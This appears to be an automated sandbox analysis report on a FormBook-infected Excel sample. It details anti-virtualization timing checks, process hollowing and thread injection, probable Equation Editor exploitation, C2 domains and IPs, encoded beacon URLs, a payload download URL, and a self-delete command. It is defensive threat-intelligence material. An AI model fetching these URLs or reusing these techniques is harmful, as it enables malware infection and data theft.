          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2088Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.538166262.000000000457A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.538166262.000000000457A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.463398411.00000000005C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.484429765.0000000003D90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e Mi3
          Source: explorer.exe, 00000006.00000000.535212313.000000000029B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.484429765.0000000003D90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000023}\
          Source: explorer.exe, 00000006.00000000.538350640.00000000045D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00460402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00460744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00460706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00460616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004606C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B50 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exeDomain query: www.mollyagee.com
          Source: C:\Windows\explorer.exeDomain query: www.youngliving1.com
          Source: C:\Windows\explorer.exeNetwork Connect: 1.32.255.137 80
          Source: C:\Windows\explorer.exeDomain query: www.zoharfine.com
          Source: C:\Windows\explorer.exeDomain query: www.teentykarm.quest
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.5.156.29 80
          Source: C:\Windows\explorer.exeDomain query: www.927291.com
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: A40000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception612
          Process Injection          		111
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          Extra Window Memory Injection          		1
          Disable or Modify Tools          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth14
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts13
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer123
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials14
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Extra Window Memory Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562479 Sample: W6902.xlsx Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 40 www.frentags.art 2->40 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 13 other signatures 2->56 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 27 2->16         started        signatures3 process4 dnsIp5 48 212.192.246.120, 49165, 80 RHC-HOSTINGGB Russian Federation 11->48 36 C:\Users\user\AppData\Local\...\gntek[1].exe, PE32 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32 11->38 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->76 18 vbc.exe 19 11->18         started        file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\Temp\...\npsx.dll, PE32 18->34 dropped 58 Multi AV Scanner detection for dropped file 18->58 60 Machine Learning detection for dropped file 18->60 62 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 18->62 64 2 other signatures 18->64 22 vbc.exe 18->22         started        signatures10 process11 signatures12 66 Modifies the context of a thread in another process (thread injection) 22->66 68 Maps a DLL or memory area into another process 22->68 70 Sample uses process hollowing technique 22->70 72 Queues an APC in another process (thread injection) 22->72 25 explorer.exe 22->25 injected process13 dnsIp14 42 www.teentykarm.quest 37.123.118.150, 49167, 80 UK2NET-ASGB United Kingdom 25->42 44 www.927291.com 1.32.255.137, 49166, 80 BCPL-SGBGPNETGlobalASNSG Singapore 25->44 46 5 other IPs or domains 25->46 74 System process connects to network (likely due to code injection or exploit) 25->74 29 msdt.exe 25->29         started        signatures15 process16 signatures17 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe35%ReversingLabsWin32.Trojan.Risis
          C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll46%ReversingLabsWin32.Trojan.Midie
          C:\Users\Public\vbc.exe35%ReversingLabsWin32.Trojan.Risis

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.msdt.exe.2b1796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.4e0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msdt.exe.41fb58.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89100%Avira URL Cloudmalware
          http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.dreamschools.online/b80i/100%Avira URL Cloudphishing
          http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://212.192.246.120/gntek.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.teentykarm.quest
          		37.123.118.150
          		truetrue
            		unknown
            ghs.googlehosted.com
            		172.217.168.19
            		truefalse
              		unknown
              www.frentags.art
              		44.227.76.166
              		truefalse
                		unknown
                www.927291.com
                		1.32.255.137
                		truetrue
                  		unknown
                  zoharfine.com
                  		194.5.156.29
                  		truetrue
                    		unknown
                    www.zoharfine.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.mollyagee.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.youngliving1.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89false
                          • Avira URL Cloud: malware
                          		unknown
                          www.dreamschools.online/b80i/true
                          • Avira URL Cloud: phishing
                          		low
                          http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89true
                          • Avira URL Cloud: malware
                          		unknown
                          http://212.192.246.120/gntek.exetrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://investor.msn.comexplorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drfalse
                                  		high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    http://treyresearch.netexplorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://java.sun.comexplorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3Hmsdt.exe, 00000007.00000002.669852411.0000000002C92000.00000004.10000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drfalse
                                            		high
                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://investor.msn.com/explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.478539396.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.537917620.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.%s.comPAexplorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		low
                                                  http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.orgexplorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.491342843.0000000003E50000.00000002.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
